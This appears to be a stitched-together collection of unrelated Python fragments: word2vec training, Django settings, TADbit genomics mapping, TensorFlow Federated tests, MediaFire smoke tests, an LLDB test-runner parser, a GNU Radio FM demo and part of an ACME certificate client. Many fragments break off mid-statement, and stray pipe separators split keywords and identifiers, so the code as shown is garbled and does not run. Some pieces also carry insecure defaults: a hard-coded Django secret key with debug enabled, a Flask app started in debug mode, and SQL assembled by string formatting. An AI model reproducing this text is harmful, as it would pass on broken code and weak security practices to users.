OUTPUT_MODEL_FILE | = "w2v_yelp_100_alpha_0.025_window_4"
PICKLED_DATA = "/home/alfredo/deep-nlp/data/reviews.pickle."
NUM_PARTITIONS = 2 # Use all data
reviews_texts, _, _, _, _ = get_reviews_data(range(1, NUM_PARTITIONS), PICKLED_DATA)
# Each review will be considered a sentence
sentences = []
for num, text in enumerate(reviews_texts):
if num % 10000 == 0:
print "%d out of %d reviews read" % (num, len(reviews_texts))
if FILTER_ENGLISH:
if detect_language(text) == u"english":
sentences.append(tokenize_text(text))
else:
sentences.append(text)
# Build a w2v model
w2v = Word2Vec(sentences=sentences, size=100, alpha=0.025, window=4, min_count=2, sample=1e-5, workers=4, negative=10)
w2v.save(OUTPUT_MODEL_FILE)
|
# Django settings for python project.
DEBUG = True
import logging
LOG_LEVEL = logging.INFO
if DEBUG:
LOG_LEVEL = logging.DEBUG
logging.basicConfig(
level = LOG_LEVEL,
format = '[%(asctime)s %(name)s %(levelname)s] %(message)s',
)
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = '' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = '' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# | to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, | JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '!q2sh7ue8^=bu&wj9tb9&4fx^dayk=wnxo^mtd)xmw1y2)6$w$'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.doc.XViewMiddleware',
)
ROOT_URLCONF = 'python.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
)
|
if renz == 'NONE':
opts.renz[n] = None
continue
try:
_ = RESTRICTION_ENZYMES[renz]
except KeyError:
print ('\n\nERROR: restriction enzyme %s not found.' % (renz)
+ 'Use one of:\n\n'
+ ' '.join(sorted(RESTRICTION_ENZYMES)) + '\n\n')
raise KeyError()
except AttributeError:
pass
# check skip
if not path.exists(opts.workdir) and opts.skip:
print ('WARNING: can use output files, found, not skipping...')
opts.skip = False
# number of cpus
if opts.cpus == 0:
opts.cpus = cpu_count()
else:
opts.cpus = min(opts.cpus, cpu_count())
# check paths
if opts.mapper == 'gem' and not path.exists(opts.index):
raise IOError('ERROR: index file not found at ' + opts.index)
if not path.exists(opts.fastq):
raise IOError('ERROR: FASTQ file not found at ' + opts.fastq)
if not is_fastq(opts.fastq):
raise IOError(('ERROR: FASTQ file %s wrong format, check') % (opts.fastq))
try:
opts.windows = [[int(i) for i in win.split(':')]
for win in opts.windows]
except TypeError:
pass
mkdir(opts.workdir)
# write log
# if opts.mapping_only:
log_format = '[MAPPING {} READ{}] %(message)s'.format(opts.fastq, opts.read)
# else:
# log_format = '[DEFAULT] %(message)s'
# reset logging
logging.getLogger().handlers = []
try:
print('Writing log to ' + path.join(opts.workdir, 'process.log'))
logging.basicConfig(level=logging.INFO,
format=log_format,
filename=path.join(opts.workdir, 'process.log'),
filemode='a+')
except IOError:
logging.basicConfig(level=logging.DEBUG,
format=log_format,
filename=path.join(opts.workdir, 'process.log2'),
filemode='a+')
# to display log on stdout also
logging.getLogger().addHandler(logging.StreamHandler())
# write version log
vlog_path = path.join(opts.workdir, 'TADbit_and_dependencies_versions.log')
dependencies = get_dependencies_version()
if not path.exists(vlog_path) or open(vlog_path).readlines() != dependencies:
logging.info('Writing versions of TADbit and dependencies')
vlog = open(vlog_path, 'w')
vlog.write(dependencies)
vlog.close()
# check mapper extra options
if opts.mapper_param:
if (len(opts.mapper_param) == 1
and ('-' in opts.mapper_param[0] or
'--' in opts.mapper_param[0])):
# Single string surrounded by quotes
| opts.mapper_param = opts.mappe | r_param[0].split()
else:
opts.mapper_param = dict([o.split(':') for o in opts.mapper_param])
else:
opts.mapper_param = {}
if opts.mapper == 'gem' and opts.gem_version < 3:
gem_valid_option = set(["granularity", "q", "quality-format",
"gem-quality-threshold", "mismatch-alphabet",
"m", "e", "min-matched-bases",
"max-big-indel-length", "s", "strata-after-best",
"fast-mapping", "unique-mapping", "d", "D",
"allow-incomplete-strata", "max-decoded-matches",
"min-decoded-strata", "p", "paired-end-alignment",
"b", "map-both-ends", "min-insert-size",
"max-insert-size", "E", "max-extendable-matches",
"max-extensions-per-match", "unique-pairing"])
for k in opts.mapper_param:
if not k in gem_valid_option:
raise NotImplementedError(('ERROR: option "%s" not a valid GEM option'
'or not suported by this tool.') % k)
# create empty DB if don't exists
dbpath = path.join(opts.workdir, 'trace.db')
open(dbpath, 'a').close()
# for lustre file system....
if 'tmpdb' in opts and opts.tmpdb:
dbdir = opts.tmpdb
# tmp file
dbfile = 'trace_%s' % (''.join([ascii_letters[int(random() * 52)]
for _ in range(10)]))
opts.tmpdb = path.join(dbdir, dbfile)
try:
copyfile(path.join(opts.workdir, 'trace.db'), opts.tmpdb)
except IOError:
pass
# check if job already run using md5 digestion of parameters
if already_run(opts):
if 'tmpdb' in opts and opts.tmpdb:
remove(path.join(dbdir, dbfile))
exit('WARNING: exact same job already computed, see JOBs table above')
@retry(lite.OperationalError, tries=20, delay=2)
def save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time):
"""
write little DB to keep track of processes and options
"""
if 'tmpdb' in opts and opts.tmpdb:
# check lock
while path.exists(path.join(opts.workdir, '__lock_db')):
time.sleep(0.5)
# close lock
open(path.join(opts.workdir, '__lock_db'), 'a').close()
# tmp file
dbfile = opts.tmpdb
try: # to copy in case read1 was already mapped for example
copyfile(path.join(opts.workdir, 'trace.db'), dbfile)
except IOError:
pass
else:
dbfile = path.join(opts.workdir, 'trace.db')
con = lite.connect(dbfile)
with con:
# check if table exists
cur = con.cursor()
cur.execute("""SELECT name FROM sqlite_master WHERE
type='table' AND name='MAPPED_INPUTs'""")
if not cur.fetchall():
try:
cur.execute("""
create table PATHs
(Id integer primary key,
JOBid int, Path text, Type text,
unique (Path))""")
except lite.OperationalError:
pass # may append when mapped files cleaned
cur.execute("""
create table JOBs
(Id integer primary key,
Parameters text,
Launch_time text,
Finish_time text,
Type text,
Parameters_md5 text,
unique (Parameters_md5))""")
cur.execute("""
create table MAPPED_INPUTs
(Id integer primary key,
PATHid int,
Entries int,
Trim text,
Frag text,
Read int,
Enzyme text,
Dangling_Ends text,
Ligation_Sites text,
WRKDIRid int,
MAPPED_OUTPUTid int,
INDEXid int,
unique (PATHid,Entries,Read,Enzyme,WRKDIRid,MAPPED_OUTPUTid,INDEXid))""")
try:
parameters = digest_parameters(opts, get_md5=False)
param_hash = digest_parameters(opts, get_md5=True)
cur.execute("""
insert into JOBs
(Id , Parameters, Launch_time, Finish_time, Type , Parameters_md5)
values
(NULL, '%s', '%s', '%s', 'Map', '%s')
""" % (parameters,
time.strftime("%d/%m/%Y %H:%M:%S", launch_time),
time.strftime("%d/%m/%Y %H:%M:%S", finish_time), param_hash))
except lite.IntegrityError:
pass
jobid = get_jobid(cur)
add_path(cur, opts.workdir, 'WORKDIR', jobid)
add_path(cur, opts.fastq , 'MAPPED_FASTQ' , jobid, opts.workdir)
add_path(cur, opts.index , 'INDEX' , jobid, opts.workdir)
add_path(cur, fig_path , 'FIGURE' , jobid, opts.workdir)
for i, (out, num) in enumerate(outfiles):
try:
window = opts.windows[i]
except IndexError:
window = opts.windows[-1]
except TypeError:
window = 'None'
add_path(cur, out,'2D_BED' if opts.read == 0 else 'SAM/MAP', jobid, |
C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from absl.testing import parameterized
import tensorflow as tf
import tensorflow_federated as tff
from compressed_communication.aggregators.comparison_methods import one_bit_sgd
_test_integer_tensor_type = (tf.int32, (3,))
_test_float_struct_type = [(tf.float32, (2,)), (tf.float32, (3,))]
_test_float_tensor_type = (tf.float32, (3,))
class OneBitSGDComputationTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_one_bit_sgd_properties(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_typ | e)
self.assertIsInstance(process, tff.templates.AggregationProcess)
|
server_state_type = tff.type_at_server(())
expected_initialize_type = tff.FunctionType(
parameter=None, result=server_state_type)
self.assert_types_equivalent(process.initialize.type_signature,
expected_initialize_type)
expected_measurements_type = tff.type_at_server(
collections.OrderedDict(
avg_bitrate=tf.float32,
avg_distortion=tf.float32))
expected_next_type = tff.FunctionType(
parameter=collections.OrderedDict(
state=server_state_type, value=tff.type_at_clients(value_type)),
result=tff.templates.MeasuredProcessOutput(
state=server_state_type,
result=tff.type_at_server(value_type),
measurements=expected_measurements_type))
self.assert_types_equivalent(process.next.type_signature,
expected_next_type)
@parameterized.named_parameters(
("integer_tensor", _test_integer_tensor_type),
("float_struct", _test_float_struct_type))
def test_one_bit_sgd_create_raises(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
self.assertRaises(ValueError, factory.create, value_type)
class OneBitSGDExecutionTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * 2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [-1.0 * tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * -2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[0.0, 2.0, -1.0] for _ in range(2)]
expected_result = [2.0, 2.0, -2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_nonzero_threshold(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0] for _ in range(2)]
expected_result = [0.0, 0.0, 4.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_one_client(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0]]
expected_result = [0.0, 0.0, 2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_different_clients(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0], [1.0, 1.0, 1.0]]
expected_result = [1.0, 1.0, 3.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./6.)
output = process.next(state, client_values)
s |
#!/usr/bin/python
i | mport sys
import requests
try:
url = sys.argv[1]
r = requests.get('http://%s' %url ,timeout=3)
except requests.exceptions.Timeout:
print 'url timeout\n%s' %url
sys.exit(2)
except:
print 'url error \n%s' %url
sys.exit(2)
url_status = r.status_code
if url_status == 200:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(0)
else:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(2) | |
# CTCI 1.3
# URLify
import unittest
# My Solution
#------------------------------------------ | -------------------------------------
# CTCI Solution
def urlify(string, length):
'''function replaces single spaces with %20 and removes trailing spaces'''
new_index = len(string)
for i | in reversed(range(length)):
if string[i] == ' ':
# Replace spaces
string[new_index - 3:new_index] = '%20'
new_index -= 3
else:
# Move characters
string[new_index - 1] = string[i]
new_index -= 1
return string
#-------------------------------------------------------------------------------
#Testing
class Test(unittest.TestCase):
'''Test Cases'''
# Using lists because Python strings are immutable
data = [
(list('much ado about nothing '), 22,
list('much%20ado%20about%20nothing')),
(list('Mr John Smith '), 13, list('Mr%20John%20Smith'))]
def test_urlify(self):
for [test_string, length, expected] in self.data:
actual = urlify(test_string, length)
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
|
# System imports
import os
from os.path import join
import pytest
from git import *
from PyGitUp.git_wrapper import RebaseError
from PyGitUp.tests import basepath, write_file, init_master, update_file, testfile_name
test_name = 'rebase_error'
repo_path = join(basepath, test_name + os.sep)
def setup():
master_path, master = init_master(test_name)
# Prepare master repo
master.git.checkout(b=test_name)
# Clone | to test repo
path = join(basepath, test_name)
master.clone(path, b=test_name)
repo = Repo(path, odbt=GitCmdObjectDB)
assert repo.working_dir == path
# Modify file in master
update_file(master, test_name)
# Modify file in our repo
contents = 'completely changed!'
repo_file = join(path, testfile_name)
write_file(repo_file, contents)
repo.index.add([repo_file])
repo.index.commit(test_name)
# M | odify file in master
update_file(master, test_name)
def test_rebase_error():
""" Run 'git up' with a failing rebase """
os.chdir(repo_path)
from PyGitUp.gitup import GitUp
gitup = GitUp(testing=True)
with pytest.raises(RebaseError):
gitup.run()
|
#!/usr/bin/env python
#! -*- coding: utf-8 -*-
from gi.repository import Cld
from gi.repository import DcsCore as dc
from gi.repository import DcsUI as du
from gi.repository import Gtk
class DcsExample(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="DCS Example")
config = Cld.XmlConfig.with_file_name("examples/cld.xml")
self.context = Cld.Context.from_config(config)
self.chan = self.context.get_obje | ct("ai0")
self.dev = self.context.get_object("dev0")
self.dev.open()
if(not self.dev.is_open):
print "Open device " + self.dev.id + " failed"
#self.task = self.context.get_object("tk0")
#self.task.run()
self.aictl = du.AIControl("/ai0")
self.aictl.connect("request_object", self.offer)
self.add(self.aictl)
def offer | (self, widget):
widget.offer_cld_object(self.chan)
win = DcsExample()
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
|
#!/usr/bin/python
import io
import os
import unittest
import logging
import uuid
from mediafire import MediaFireApi, MediaFireUploader, UploadSession
from mediafire.uploader import UPLOAD_SIMPLE_LIMIT_BYTES
APP_ID = '42511'
MEDIAFIRE_EMAIL = os.environ.get('MEDIAFIRE_EMAIL')
MEDIAFIRE_PASSWORD = os.environ.get('MEDIAFIRE_PASSWORD')
class MediaFireSmokeBaseTestCase(object):
"""Smoke tests for API"""
class Ba | seTest(unittest.TestCase):
def setUp(self):
# Reset logging to info to avoid leaking credentials
logger = logging.getLogger('mediafire.api')
logger.setLevel(logging.INFO)
self.api = MediaFireApi()
session = self.api.user_get_session_token(
app_id=APP_ID, email=MEDIAFIRE_EMAIL,
password=MEDIAFIRE_PASSWORD)
self.api.session = session
@u | nittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeSimpleTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Simple tests"""
def test_user_get_info(self):
result = self.api.user_get_info()
self.assertEqual(result["user_info"]["display_name"],
u"Coalmine Smoketest")
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeWithDirectoryTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Smoke tests requiring temporary directory"""
def setUp(self):
super(MediaFireSmokeWithDirectoryTest, self).setUp()
folder_uuid = str(uuid.uuid4())
result = self.api.folder_create(foldername=folder_uuid)
self.folder_key = result["folder_key"]
def tearDown(self):
self.api.folder_purge(self.folder_key)
def test_upload_small(self):
"""Test simple upload"""
# make sure we most likely will get upload/simple
data = b'This is a tiny file content: ' + os.urandom(32)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'smallfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/simple')
def test_upload_large(self):
"""Test large file upload"""
# make sure we will get upload/resumable, prefix + 4MiB
data = b'Long line is long: ' + os.urandom(UPLOAD_SIMPLE_LIMIT_BYTES)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'bigfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/resumable')
if __name__ == "__main__":
unittest.main()
|
with each list under a matching header (xfail files, xfail methods, skip files, skip methods)'''))
group.add_argument(
'-G',
'--category',
metavar='category',
action='append',
dest='categoriesList',
help=textwrap.dedent('''Specify categories of test cases of interest. Can be specified more than once.'''))
group.add_argument(
'--skip-category',
metavar='category',
action='append',
dest='skipCategories',
help=textwrap.dedent('''Specify categories of test cases to skip. Takes precedence over -G. Can | be specified more than once.'''))
# Configuration options
group = parser.add_argument_group('Configuration options')
group.add_ar | gument(
'--framework',
metavar='framework-path',
help='The path to LLDB.framework')
group.add_argument(
'--executable',
metavar='executable-path',
help='The path to the lldb executable')
group.add_argument(
'--server',
metavar='server-path',
help='The path to the debug server executable to use')
group.add_argument(
'--out-of-tree-debugserver',
dest='out_of_tree_debugserver',
action='store_true',
help='A flag to indicate an out-of-tree debug server is being used')
group.add_argument(
'-s',
metavar='name',
help='Specify the name of the dir created to store the session files of tests with errored or failed status. If not specified, the test driver uses the timestamp as the session dir name')
group.add_argument(
'-S',
'--session-file-format',
default=configuration.session_file_format,
metavar='format',
help='Specify session file name format. See configuration.py for a description.')
group.add_argument(
'-y',
type=int,
metavar='count',
help="Specify the iteration count used to collect our benchmarks. An example is the number of times to do 'thread step-over' to measure stepping speed.")
group.add_argument(
'-#',
type=int,
metavar='sharp',
dest='sharp',
help='Repeat the test suite for a specified number of times')
group.add_argument('--channel', metavar='channel', dest='channels', action='append', help=textwrap.dedent(
"Specify the log channels (and optional categories) e.g. 'lldb all' or 'gdb-remote packets' if no categories are specified, 'default' is used"))
group.add_argument(
'--log-success',
dest='log_success',
action='store_true',
help="Leave logs/traces even for successful test runs (useful for creating reference log files during debugging.)")
group.add_argument(
'--codesign-identity',
metavar='Codesigning identity',
default='lldb_codesign',
help='The codesigning identity to use')
group.add_argument(
'--build-dir',
dest='test_build_dir',
metavar='Test build directory',
default='lldb-test-build.noindex',
help='The root build directory for the tests. It will be removed before running.')
# Configuration options
group = parser.add_argument_group('Remote platform options')
group.add_argument(
'--platform-name',
dest='lldb_platform_name',
metavar='platform-name',
help='The name of a remote platform to use')
group.add_argument(
'--platform-url',
dest='lldb_platform_url',
metavar='platform-url',
help='A LLDB platform URL to use when connecting to a remote platform to run the test suite')
group.add_argument(
'--platform-working-dir',
dest='lldb_platform_working_dir',
metavar='platform-working-dir',
help='The directory to use on the remote platform.')
# Test-suite behaviour
group = parser.add_argument_group('Runtime behaviour options')
X('-d', 'Suspend the process after launch to wait indefinitely for a debugger to attach')
X('-q', "Don't print extra output from this script.")
X('-t', 'Turn on tracing of lldb command and other detailed test executions')
group.add_argument(
'-u',
dest='unset_env_varnames',
metavar='variable',
action='append',
help='Specify an environment variable to unset before running the test cases. e.g., -u DYLD_INSERT_LIBRARIES -u MallocScribble')
group.add_argument(
'--env',
dest='set_env_vars',
metavar='variable',
action='append',
help='Specify an environment variable to set to the given value before running the test cases e.g.: --env CXXFLAGS=-O3 --env DYLD_INSERT_LIBRARIES')
X('-v', 'Do verbose mode of unittest framework (print out each test case invocation)')
group.add_argument(
'--enable-crash-dialog',
dest='disable_crash_dialog',
action='store_false',
help='(Windows only) When LLDB crashes, display the Windows crash dialog.')
group.set_defaults(disable_crash_dialog=True)
group = parser.add_argument_group('Parallel execution options')
group.add_argument(
'--inferior',
action='store_true',
help=('specify this invocation is a multiprocess inferior, '
'used internally'))
group.add_argument(
'--no-multiprocess',
action='store_true',
help='skip running the multiprocess test runner')
group.add_argument(
'--threads',
type=int,
dest='num_threads',
default=default_thread_count(),
help=('The number of threads/processes to use when running tests '
'separately, defaults to the number of CPU cores available'))
group.add_argument(
'--test-subdir',
action='store',
help='Specify a test subdirectory to use relative to the test root dir'
)
group.add_argument(
'--test-runner-name',
action='store',
help=('Specify a test runner strategy. Valid values: multiprocessing,'
' multiprocessing-pool, serial, threading, threading-pool')
)
# Test results support.
group = parser.add_argument_group('Test results options')
group.add_argument(
'--curses',
action='store_true',
help='Shortcut for specifying test results using the curses formatter')
group.add_argument(
'--results-file',
action='store',
help=('Specifies the file where test results will be written '
'according to the results-formatter class used'))
group.add_argument(
'--results-port',
action='store',
type=int,
help=('Specifies the localhost port to which the results '
'formatted output should be sent'))
group.add_argument(
'--results-formatter',
action='store',
help=('Specifies the full package/module/class name used to translate '
'test events into some kind of meaningful report, written to '
'the designated output results file-like object'))
group.add_argument(
'--results-formatter-option',
'-O',
action='append',
dest='results_formatter_options',
help=('Specify an option to pass to the formatter. '
'Use --results-formatter-option="--option1=val1" '
'syntax. Note the "=" is critical, don\'t include whitespace.'))
group.add_argument(
'--event-add-entries',
action='store',
help=('Specify comma-separated KEY=VAL entries to add key and value '
'pairs to all test events generated by this test run. VAL may '
'be specified as VAL:TYPE, where TYPE may be int to convert '
'the value to an int'))
# Re-run related arguments
group = parser.add_argument_group('Test Re-run Options')
group.add_argument(
'--rerun-all-issues',
action='store_true',
help=('Re-run all issues that occurred during the test run '
'irrespective of the test method\'s marking as flakey. '
'Default behavior is to apply re-runs only to |
#!/usr/bin/env python
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr
from gnuradio import blocks
from gnuradio import filter
from gnuradio import analog
from gnuradio import audio
from gnuradio.filter import firdes
from gnuradio.fft import window
import sys, math
# Create a top_block
class build_graph(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
input_rate = 200e3 # rate of a broadcast FM station
audio_rate = 44.1e3 # Rate we send the signal to the speaker
# resample from the output of the demodulator to the rate of
# the audio sink.
resamp_rate = audio_rate / input_rate
# use a file as a dummy source. Replace this with a real radio
# receiver to capture signals over-the-air.
src = blocks.file_source(gr.sizeof_gr_complex, "dummy.dat", True)
# Set the demodulator using the same deviation as the receiver.
max_dev = 75e3
fm_demod_gain = input_rate / (2*math.pi*max_dev/8.0)
fm_demod = analog.quadrature_demod_cf(fm_demod_gain)
# Create a filter for the resampler and filter the audio
# signal to 15 kHz. The nfilts is the number of filters in the
# arbitrary resampler. It logically operates at a rate of
# nfilts*input_rate, so we make those adjustments when
# building the filter.
volume = 0.20
nfilts = 32
resamp_taps = firdes.low_pass_2(volume*nfilts, # gain
nfilts*input_rate, # sampling rate
15e3, # low pass cutoff freq
1e3, # width of trans. band
60, # stop band attenuaton
window.WIN_KAISER)
# Build the resampler and filter
resamp_filter = filter.pfb_arb_resampler_fff(resamp_rate,
resamp_taps, nfilts)
# sound card as final sink You may have to add a specific
# device name as a secon | d argument here, something like
# "pulse" if using pulse audio or "plughw:0,0".
audio_sink = audio.sink(int(audio_rate))
# now wire it all together
self.connect(src, fm_demod)
self.connect(fm_demod, resamp_filter)
self.connect(resamp_filter, (audio_sink,0))
def main(args):
tb = build_g | raph()
tb.start() # fork thread and return
input('Press Enter to quit: ')
tb.stop()
if __name__ == '__main__':
main(sys.argv[1:])
|
fr | om atlas_web imp | ort app
app.run(debug=True) |
el(logging.INFO)
def get_crt(account_key, csr, acme_dir, log=LOGGER, CA=DEFAULT_CA):
# helper function base64 encode for jose spec
def _b64(b):
return base64.urlsafe_b64encode(b).decode('utf8').replace("=", "")
# parse account key to get public key
log.info("Parsing account key...")
proc = subprocess.Popen(["openssl", "rsa", "-in", account_key, "-noout", "-text"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
pub_hex, pub_exp = re.search(
r"modulus:\n\s+00:([a-f0-9\:\s]+?)\npublicExponent: ([0-9]+)",
out.decode('utf8'), re.MULTILINE|re.DOTALL).groups()
pub_exp = "{0:x}".format(int(pub_exp))
pub_exp = "0{0}".format(pub_exp) if len(pub_exp) % 2 else pub_exp
header = {
"alg": "RS256",
"jwk": {
"e": _b64(binascii.unhexlify(pub_exp)),
"kty": "RSA",
"n": _b64(binascii.unhexlify(re.sub(r"(\s|:)", "", pub_hex))),
},
}
accountkey_json = json.dumps(header['jwk'], sort_keys=True, separators=(',', ':'))
thumbprint = _b64(hashlib.sha256(accountkey_json.encode('utf8')).digest())
# helper function make signed requests
def _send_signed_request(url, payload):
payload64 = _b64(json.dumps(payload).encode('utf8'))
protected = copy.deepcopy(header)
protected["nonce"] = urlopen(CA + "/directory").headers['Replay-Nonce']
protected64 = _b64(json.dumps(protected).encode('utf8'))
proc = subprocess.Popen(["openssl", "dgst", "-sha256", "-sign", account_key],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate("{0}.{1}".format(protected64, payload64).encode('utf8'))
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
data = json.dumps({
"header": header, "protected": protected64,
"payload": payload64, "signature": _b64(out),
})
try:
resp = urlopen(url, data.encode('utf8'))
return resp.getcode(), resp.read()
except IOError as e:
return e.code, e.read()
# find domains
log.info("Parsing CSR...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-noout", "-text"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("Error loading {0}: {1}".format(csr, err))
domains = set([])
common_name = re.search(r"Subject:.*? CN=([^\s,;/]+)", out.decode('utf8'))
if common_name is not None:
domains.add(common_name.group(1))
